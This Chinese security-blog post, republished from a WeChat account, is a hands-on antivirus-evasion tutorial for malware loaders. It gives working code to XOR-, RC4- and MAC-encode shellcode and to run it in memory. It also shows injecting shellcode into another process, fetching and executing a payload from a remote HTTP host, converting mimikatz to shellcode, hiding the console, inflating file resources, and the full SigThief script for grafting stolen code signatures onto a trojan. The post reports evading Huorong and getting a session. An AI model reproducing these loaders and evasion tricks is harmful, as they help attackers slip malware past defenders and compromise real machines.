免杀专题笔记(4)

admin
admin
admin
138643
文章
114
评论
2023年11月28日13:21:01评论377 views字数 16049阅读53分29秒阅读模式

后面的更新由我朋友进行更新。

shellcode免杀

异或

第一次异或的时候会将我们的shellcode改变,第二次异或的时候就会还原我们的shellcode。

它的优点在于他不调用相关的API函数,它的本质就是一个for循环。

假如我们现在有这么一个场景需要生成一个stager分阶段的shellcode,然后再去做一个异或处理。

首先我们可以使用sgn先对shellcode进行编码操作,然后再进行异或。

首先使用sgn对shellcode进行加密:

 ./sgn -a 64 -c 15 -o sgn4.bin stage.bin

免杀专题笔记(4)

然后使用winhex打开stage.bin文件。

全选->右击->edit->copy Block->GREP Hex

免杀专题笔记(4)

复制出来之后首先进行异或处理:

#include <Windows.h>#include <iostream>#define KEY 0x29 unsigned char buf[] = "shellcode";int main(){    unsigned char c[sizeof(buf)];   //获取shellcode长度    for (int i = 0; i < sizeof(buf) - 1; i++)    {        c[i] = buf[i] ^ KEY;//进行解密        printf("\x%x", c[i]);    }    printf("n");
    return 0;
}

免杀专题笔记(4)

异或处理之后然后使用加载器进行加载,在加载之前需要进行再次异或还原shellcode。

#include "windows.h"#include "stdio.h"#pragma comment(linker, "/subsystem:"windows" /entry:"mainCRTStartup"")//运行时不显示窗口#define KEY 0x88char bufff[] = "异或后的shellcode";
void main(){    unsigned char buff[sizeof(bufff)];   //获取shellcode长度    for (int i = 0; i < sizeof(bufff) - 1; i++) {        buff[i] = bufff[i] ^ KEY;//进行解密    }    LPVOID Memory = VirtualAlloc(NULL, sizeof(buff), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);    memcpy(Memory, buff, sizeof(buff));    ((void(*)())Memory)();}

可以成功上线:

免杀专题笔记(4)

Opsec

1.sgn 编码 360 火绒 defender EDR 最大编码次数10次

2.熵值过高:UUID IPV4 IPV6 MAC地址

3.270kb 增大文件 资源文件 资源.res

4.打签名 EV签名

资源res导出:

可以使用Resource Hacke这个工具来导出,找到你要导出的exe文件。

然后放到Resource Hacke工具中,然后点击Action,选择Sava All Resources to a RES file即可。

免杀专题笔记(4)

导出之后可以看到文件的大小:、

免杀专题笔记(4)

然后将木马文件放到Resource Hacke中。

免杀专题笔记(4)

然后点击Action,选择Add from Resource file(.res,.mui,.dll,.exe)

将刚才提取出来的res文件选择。

然后选择check/UncheckAll

免杀专题笔记(4)

免杀专题笔记(4)

源文件是62kb,加了资源文件之后就变成了117kb。

免杀专题笔记(4)

这样就可以避免熵值过高了。

AES加密

AES加密支持3种长度的密钥 128 192 156,加密的方式有CBC,ECB等等。

这里不建议使用windows api来完成AES加密,它的缺点就是在导入表中会导入很多加解密的API。

RC4

RC4加密:

#include <windows.h>#include <stdio.h>
typedef NTSTATUS(WINAPI* _SystemFunction033)(  struct ustring* memoryRegion,  struct ustring* keyPointer);
struct ustring {  DWORD Length;  DWORD MaximumLength;  PUCHAR Buffer;} _data, key;
int main() {  _SystemFunction033 SystemFunction033 = (_SystemFunction033)GetProcAddress(LoadLibrary(L"advapi32"), "SystemFunction033");
  char _key[] = "www.baidu.com";
  unsigned char shellcode[] = {shellcode}  key.Buffer = (PUCHAR)(&_key);  key.Length = sizeof key;
  _data.Buffer = (PUCHAR)shellcode;  _data.Length = sizeof shellcode;
  SystemFunction033(&_data, &key);
  printf("nunsigned char shellcode[] = { ");  for (size_t i = 0; i < _data.Length; i++) {    if (!(i % 16)) printf("n    ");    printf("0x%02x, ", _data.Buffer[i]);    if (i == _data.Length - 1) printf("0x%02x };", _data.Buffer[i]);  }}

RC4解密代码:

#include <windows.h>

typedef NTSTATUS(WINAPI* _SystemFunction033)(    struct ustring* memoryRegion,    struct ustring* keyPointer);
struct ustring {    DWORD Length;    DWORD MaximumLength;    PUCHAR Buffer;} _data, key;
int main() {    _SystemFunction033 SystemFunction033 = (_SystemFunction033)GetProcAddress(LoadLibrary(L"advapi32"), "SystemFunction033");
    char _key[] = "www.baidu.com";
    unsigned char shellcode[] = {shellcode};
    key.Buffer = (PUCHAR)(&_key);    key.Length = sizeof(key);
    _data.Buffer = (PUCHAR)shellcode;    _data.Length = sizeof shellcode;
    SystemFunction033(&_data, &key);
    DWORD oldProtect = 0;    BOOL ret = VirtualProtect(shellcode, sizeof shellcode, PAGE_EXECUTE_READWRITE, &oldProtect);    //((void(*)()) & shellcode)();    EnumFonts(GetDC(0), (LPCWSTR)0, (FONTENUMPROC)(char*)shellcode, 0);}

内存解密

内存解密顾名思义就是将我们的shellcode在内存中进行解密,而不是在文件中。

首先使用sgn对shellcode进行加密之后,然后进行异或处理。

这里采用python方式进行异或处理。

#!/usr/bin/python import sys raw_data = "shellcode" new_shellcode = []for opcode in raw_data:        new_opcode = (ord(opcode) ^ 0x35)        new_shellcode.append(new_opcode)  print "".join(["\x{0}".format(hex(abs(i)).replace("0x", "")) for i in new_shellcode])

免杀专题笔记(4)

异或处理完成之后,然后进行内存解密:

#include <windows.h>#include <stdio.h>
int main(int argc, char* argv[]) {
    unsigned char shellcode[] = "异或后的shellcode";    if (argc < 2)    {        printf("Please provide a process ID n");        return 1;    }
    int process_id = atoi(argv[1]);
    HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, 0, process_id);
    if (process) {

        LPVOID base_address;        base_address = VirtualAllocEx(process, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        if (base_address) {            printf(" [+] Allocated based address is 0x%pn", base_address);
            int n = 0;

            for (int i = 0; i <= sizeof(shellcode); i++) {
                char DecodedOpCode = shellcode[i] ^ 0x35;                if (WriteProcessMemory(process, LPVOID((ULONG_PTR)base_address + n), &DecodedOpCode, 1, NULL)) {                    printf("[+] Byte Write sucessfully!n");                    n++;                }
            }            DWORD threadId = 0;            printf("[+] Running the thread ...n");            HANDLE thread = CreateRemoteThread(process, NULL, 100, (LPTHREAD_START_ROUTINE)base_address, NULL, NULL, &threadId);            printf("[+] The thread finished!n");        }        else {            printf("[+] Unable to allocate memory ... n");        }    }    else {        printf("[+] Enable to retrieve process handle ...n");    }}

可以看到火绒并没有查杀:

免杀专题笔记(4)

这里开启一个notepad的进程,然后注入。

RC4_encode 9280

免杀专题笔记(4)

可以看到正常上线:

免杀专题笔记(4)

mimikatz静态免杀

这里需要下载一个donut这个工具,这个工具是可以直接将PE文件转换成shellcode。

下载地址:https://github.com/TheWover/donut 需要注意的是下载0.9.3版本。

转换成功之后我们直接使用sgn进行加密混淆即可。

免杀专题笔记(4)

这里还有一个要说的点就是这里需要通过文件加载shellcode。

// Fileexec.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。//
#include <iostream>
#include <windows.h>
int main(int argc,char* argv[]){  DWORD dwSize;  DWORD dwReadSize;  HANDLE hFileNew;  //LPCWSTR file = L"C:\Users\46936\Desktop\file";
  hFileNew = CreateFile(argv[1], GENERIC_ALL, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
  if (hFileNew == INVALID_HANDLE_VALUE)  {    return 0;  }
  dwSize = GetFileSize(hFileNew, NULL);
  void* exec = VirtualAlloc(0, dwSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  ReadFile(hFileNew, exec, dwSize, &dwReadSize, NULL);
  ((void(*)())exec)();}
.fileexec.exe mimikat.bin

免杀专题笔记(4)

其实file文件读取shellcode就是分离免杀了。

这里不仅可以是.bin文件也可以是其他任意的文件后缀比如说.log .aaa等等

免杀专题笔记(4)

隐藏DOS窗口

#pragma comment(linker, "/subsystem:"windows" /entry:"mainCRTStartup"")
FreeConsole();
HWND handos = GetForegroundWindow();ShoWindow(handos,SW_HIDE);
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow);

API调用链

我们可以在程序执行之前去加一些无危害的垃圾代码:

这里可以使用这个工具:

选择数据类型以及要添加垃圾代码的程序,然后设置长度 以及下面的这三个值,最后点击start即可。

免杀专题笔记(4)

加入垃圾代码之后就变成了:

免杀专题笔记(4)

编码

MAC

利用python脚本转换shellcode为MAC地址,需要注意的是6个字节是一个MAC值。

def convertToMAC(shellcode):    if len(shellcode) % 6 != 0:        print("n[*] length:", len(shellcode) + (6 -(len(shellcode) % 6)))        addNullbyte = b"x00" *(6 - (len(shellcode) % 6))        shellcode += addNullbyte           mac = []    for i in range(0,len(shellcode), 6):        tmp_mac = ""        for j in shellcode[i:i + 6]:            if len(hex(j).replace("0x", "")) == 1:                tmp_mac = tmp_mac + "0" + hex(j).replace("0x","").upper() + "-"            else:                tmp_mac = tmp_mac + hex(j).replace("0x","").upper() + "-"        mac.append(tmp_mac[:-1])    return mac                            if __name__ == '__main__':    buf = b'xfcx48'    u = convertToMAC(buf)    print(str(u).replace("'","""))

免杀专题笔记(4)

#include<Windows.h>#include <iostream>#include<ip2string.h>
#pragma comment(lib,"Ntdll.lib")
const char* mac_[] ={       };int main(){    HANDLE hc = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);    void* SSSS = HeapAlloc(hc, 0, 0x100000);//申请内存    DWORD_PTR hptr = (DWORD_PTR)SSSS;    int elems = sizeof(mac_) / sizeof(mac_[0]);    PCSTR Terminator = "";
    for (int i = 0; i < elems; i++) {
        if (RtlEthernetStringToAddressA(mac_[i], &Terminator, (DL_EUI48*)hptr) == STATUS_INVALID_PARAMETER)        {            printf("ERROR!");            return 0;        }        hptr += 6;    }    EnumWindows((WNDENUMPROC)SSSS, 0);};

HTTP远程加载

HINTERNET HttpOpenRequestA(  [in] HINTERNET hConnect,   [in] LPCSTR    lpszObjectName,   [in] LPCSTR    lpszVersion,。  [in] LPCSTR    lpszReferrer,  [in] LPCSTR    *lplpszAcceptTypes,  [in] DWORD     dwFlags,  [in] DWORD_PTR dwContext);

HttpSendRequest

BOOL WINAPI HttpSendRequest(  HINTERNET hRequest,   LPCTSTR lpszHeaders,   DWORD dwHeadersLength,  LPVOID lpOptional,   DWORD dwOptionalLength );

InternetReadFile

BOOL InternetReadFile(  [in]  HINTERNET hFile,  [out] LPVOID    lpBuffer,  [in]  DWORD     dwNumberOfBytesToRead,  [out] LPDWORD   lpdwNumberOfBytesRead);

最终代码:

#include <windows.h>#pragma comment(lib,"wininet")#include <wininet.h>
int main(){  void* exec;  int payload_len = 4096;  //这里的大小实际要比shellcode的大小要大
  char host[] = "192.168.88.136";  WORD port = 8888;  char path[] = "/shellcode.bin";
  HINTERNET   session;  HINTERNET   conn;  HINTERNET   reqfile;  DWORD       nread;  
  exec = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);    session = InternetOpen("Mozilla", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
  conn = InternetConnect(session, host, port, "", "", INTERNET_SERVICE_HTTP, 0, 0);
  reqfile = HttpOpenRequest(conn,"GET", path, NULL, NULL, NULL, 0, 0);
  HttpSendRequest(reqfile, NULL, 0, 0, 0);  InternetReadFile(reqfile, exec, payload_len, &nread);
  ((void(*)())exec)();
  InternetCloseHandle(reqfile);  InternetCloseHandle(conn);  InternetCloseHandle(session);}

这里我们在运行之前需要将shellcode.bin 使用sgn进行混淆一下。

需要注意的是我这里使用的是stage生成的shellcode也就是分阶段的。

免杀专题笔记(4)

免杀专题笔记(4)

文件伪装

一般我们生成的exe文件 就是一个什么都没带的文件,那么杀软去静态扫描的时候发现你这个文件是一个不信任的文件。这样就会直接给你干掉了。

一个正常的exe文件里面包含数字签名,版本信息,产品名称,版权,文件说明,公司等等。

还有就是ico图标。

不可信任的文件什么都没有所以我们如果想过掉不可信任的话就需要加上签名,资源,版本信息,编译文件的时间戳,可以将时间戳前几年或者前几个月。

这里可以使用Resource Hack 添加资源.res文件。

免杀专题笔记(4)

添加数字签名,我们所添加的数字签名都是假的,都是不可用的,目的其实就是为了欺骗杀软。

python工具:

#!/usr/bin/env python3# LICENSE: BSD-3# Copyright: Josh Pitts @midnite_runr
import sysimport structimport shutilimport iofrom optparse import OptionParser

def gather_file_info_win(binary):        """        Borrowed from BDF...        I could just skip to certLOC... *shrug*        """        flItms = {}        binary = open(binary, 'rb')        binary.seek(int('3C', 16))        flItms['buffer'] = 0        flItms['JMPtoCodeAddress'] = 0        flItms['dis_frm_pehdrs_sectble'] = 248        flItms['pe_header_location'] = struct.unpack('<i', binary.read(4))[0]        # Start of COFF        flItms['COFF_Start'] = flItms['pe_header_location'] + 4        binary.seek(flItms['COFF_Start'])        flItms['MachineType'] = struct.unpack('<H', binary.read(2))[0]        binary.seek(flItms['COFF_Start'] + 2, 0)        flItms['NumberOfSections'] = struct.unpack('<H', binary.read(2))[0]        flItms['TimeDateStamp'] = struct.unpack('<I', binary.read(4))[0]        binary.seek(flItms['COFF_Start'] + 16, 0)        flItms['SizeOfOptionalHeader'] = struct.unpack('<H', binary.read(2))[0]        flItms['Characteristics'] = struct.unpack('<H', binary.read(2))[0]        #End of COFF        flItms['OptionalHeader_start'] = flItms['COFF_Start'] + 20
        #if flItms['SizeOfOptionalHeader']:            #Begin Standard Fields section of Optional Header        binary.seek(flItms['OptionalHeader_start'])        flItms['Magic'] = struct.unpack('<H', binary.read(2))[0]        flItms['MajorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]        flItms['MinorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]        flItms['SizeOfCode'] = struct.unpack("<I", binary.read(4))[0]        flItms['SizeOfInitializedData'] = struct.unpack("<I", binary.read(4))[0]        flItms['SizeOfUninitializedData'] = struct.unpack("<I",                                                               binary.read(4))[0]        flItms['AddressOfEntryPoint'] = struct.unpack('<I', binary.read(4))[0]        flItms['PatchLocation'] = flItms['AddressOfEntryPoint']        flItms['BaseOfCode'] = struct.unpack('<I', binary.read(4))[0]        if flItms['Magic'] != 0x20B:            flItms['BaseOfData'] = struct.unpack('<I', binary.read(4))[0]        # End Standard Fields section of Optional Header        # Begin Windows-Specific Fields of Optional Header        if flItms['Magic'] == 0x20B:            flItms['ImageBase'] = struct.unpack('<Q', binary.read(8))[0]        else:            flItms['ImageBase'] = struct.unpack('<I', binary.read(4))[0]        flItms['SectionAlignment'] = struct.unpack('<I', binary.read(4))[0]        flItms['FileAlignment'] = struct.unpack('<I', binary.read(4))[0]        flItms['MajorOperatingSystemVersion'] = struct.unpack('<H',                                                                   binary.read(2))[0]        flItms['MinorOperatingSystemVersion'] = struct.unpack('<H',                                                                   binary.read(2))[0]        flItms['MajorImageVersion'] = struct.unpack('<H', binary.read(2))[0]        flItms['MinorImageVersion'] = struct.unpack('<H', binary.read(2))[0]        flItms['MajorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]        flItms['MinorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]        flItms['Win32VersionValue'] = struct.unpack('<I', binary.read(4))[0]        flItms['SizeOfImageLoc'] = binary.tell()        flItms['SizeOfImage'] = struct.unpack('<I', binary.read(4))[0]        flItms['SizeOfHeaders'] = struct.unpack('<I', binary.read(4))[0]        flItms['CheckSum'] = struct.unpack('<I', binary.read(4))[0]        flItms['Subsystem'] = struct.unpack('<H', binary.read(2))[0]        flItms['DllCharacteristics'] = struct.unpack('<H', binary.read(2))[0]        if flItms['Magic'] == 0x20B:            flItms['SizeOfStackReserve'] = struct.unpack('<Q', binary.read(8))[0]            flItms['SizeOfStackCommit'] = struct.unpack('<Q', binary.read(8))[0]            flItms['SizeOfHeapReserve'] = struct.unpack('<Q', binary.read(8))[0]            flItms['SizeOfHeapCommit'] = struct.unpack('<Q', binary.read(8))[0]
        else:            flItms['SizeOfStackReserve'] = struct.unpack('<I', binary.read(4))[0]            flItms['SizeOfStackCommit'] = struct.unpack('<I', binary.read(4))[0]            flItms['SizeOfHeapReserve'] = struct.unpack('<I', binary.read(4))[0]            flItms['SizeOfHeapCommit'] = struct.unpack('<I', binary.read(4))[0]        flItms['LoaderFlags'] = struct.unpack('<I', binary.read(4))[0]  # zero        flItms['NumberofRvaAndSizes'] = struct.unpack('<I', binary.read(4))[0]        # End Windows-Specific Fields of Optional Header        # Begin Data Directories of Optional Header        flItms['ExportTableRVA'] = struct.unpack('<I', binary.read(4))[0]        flItms['ExportTableSize'] = struct.unpack('<I', binary.read(4))[0]        flItms['ImportTableLOCInPEOptHdrs'] = binary.tell()        #ImportTable SIZE|LOC        flItms['ImportTableRVA'] = struct.unpack('<I', binary.read(4))[0]        flItms['ImportTableSize'] = struct.unpack('<I', binary.read(4))[0]        flItms['ResourceTable'] = struct.unpack('<Q', binary.read(8))[0]        flItms['ExceptionTable'] = struct.unpack('<Q', binary.read(8))[0]        flItms['CertTableLOC'] = binary.tell()        flItms['CertLOC'] = struct.unpack("<I", binary.read(4))[0]        flItms['CertSize'] = struct.unpack("<I", binary.read(4))[0]        binary.close()        return flItms

def copyCert(exe):    flItms = gather_file_info_win(exe)
    if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:        # not signed        print("Input file Not signed!")        sys.exit(-1)
    with open(exe, 'rb') as f:        f.seek(flItms['CertLOC'], 0)        cert = f.read(flItms['CertSize'])    return cert

def writeCert(cert, exe, output):    flItms = gather_file_info_win(exe)        if not output:         output = output = str(exe) + "_signed"
    shutil.copy2(exe, output)        print("Output file: {0}".format(output))
    with open(exe, 'rb') as g:        with open(output, 'wb') as f:            f.write(g.read())            f.seek(0)            f.seek(flItms['CertTableLOC'], 0)            f.write(struct.pack("<I", len(open(exe, 'rb').read())))            f.write(struct.pack("<I", len(cert)))            f.seek(0, io.SEEK_END)            f.write(cert)
    print("Signature appended. nFIN.")

def outputCert(exe, output):    cert = copyCert(exe)    if not output:        output = str(exe) + "_sig"
    print("Output file: {0}".format(output))
    open(output, 'wb').write(cert)
    print("Signature ripped. nFIN.")

def check_sig(exe):    flItms = gather_file_info_win(exe)     if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:        # not signed        print("Inputfile Not signed!")    else:        print("Inputfile is signed!")

def truncate(exe, output):    flItms = gather_file_info_win(exe)     if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:        # not signed        print("Inputfile Not signed!")        sys.exit(-1)    else:        print( "Inputfile is signed!")
    if not output:        output = str(exe) + "_nosig"
    print("Output file: {0}".format(output))
    shutil.copy2(exe, output)
    with open(output, "r+b") as binary:        print('Overwriting certificate table pointer and truncating binary')        binary.seek(-flItms['CertSize'], io.SEEK_END)        binary.truncate()        binary.seek(flItms['CertTableLOC'], 0)        binary.write(b"x00x00x00x00x00x00x00x00")
    print("Signature removed. nFIN.")

def signfile(exe, sigfile, output):    flItms = gather_file_info_win(exe)        cert = open(sigfile, 'rb').read()
    if not output:         output = output = str(exe) + "_signed"
    shutil.copy2(exe, output)        print("Output file: {0}".format(output))        with open(exe, 'rb') as g:        with open(output, 'wb') as f:            f.write(g.read())            f.seek(0)            f.seek(flItms['CertTableLOC'], 0)            f.write(struct.pack("<I", len(open(exe, 'rb').read())))            f.write(struct.pack("<I", len(cert)))            f.seek(0, io.SEEK_END)            f.write(cert)    print("Signature appended. nFIN.")

if __name__ == "__main__":    usage = 'usage: %prog [options]'    parser = OptionParser()    parser.add_option("-i", "--file", dest="inputfile",                   help="input file", metavar="FILE")    parser.add_option('-r', '--rip', dest='ripsig', action='store_true',                  help='rip signature off inputfile')    parser.add_option('-a', '--add', dest='addsig', action='store_true',                  help='add signautre to targetfile')    parser.add_option('-o', '--output', dest='outputfile',                  help='output file')    parser.add_option('-s', '--sig', dest='sigfile',                  help='binary signature from disk')    parser.add_option('-t', '--target', dest='targetfile',                  help='file to append signature to')    parser.add_option('-c', '--checksig', dest='checksig', action='store_true',                  help='file to check if signed; does not verify signature')    parser.add_option('-T', '--truncate', dest="truncate", action='store_true',                  help='truncate signature (i.e. remove sig)')    (options, args) = parser.parse_args()        # rip signature    # inputfile and rip to outputfile    if options.inputfile and options.ripsig:        print("Ripping signature to file!")        outputCert(options.inputfile, options.outputfile)        sys.exit()    
    # copy from one to another    # inputfile and rip to targetfile to outputfile        if options.inputfile and options.targetfile:        cert = copyCert(options.inputfile)        writeCert(cert, options.targetfile, options.outputfile)        sys.exit()
    # check signature    # inputfile     if options.inputfile and options.checksig:        check_sig(options.inputfile)         sys.exit()
    # add sig to target file    if options.targetfile and options.sigfile:        signfile(options.targetfile, options.sigfile, options.outputfile)        sys.exit()            # truncate    if options.inputfile and options.truncate:        truncate(options.inputfile, options.outputfile)        sys.exit()
    parser.print_help()    parser.error("You must do something!")
python sigthief.py -i 有签名的那个文件 -t 需要伪造签名的文件 -o 生成的新的文件

免杀专题笔记(4)

免杀专题笔记(4)

同样除了伪造签名之外也可以给代码添加一些垃圾代码,360QVM会检测你的代码,如果越简单那么越容易被杀。

原文始发于微信公众号(Relay学安全):免杀专题笔记(4)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月28日13:21:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   免杀专题笔记(4)https://cn-sec.com/archives/2246647.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息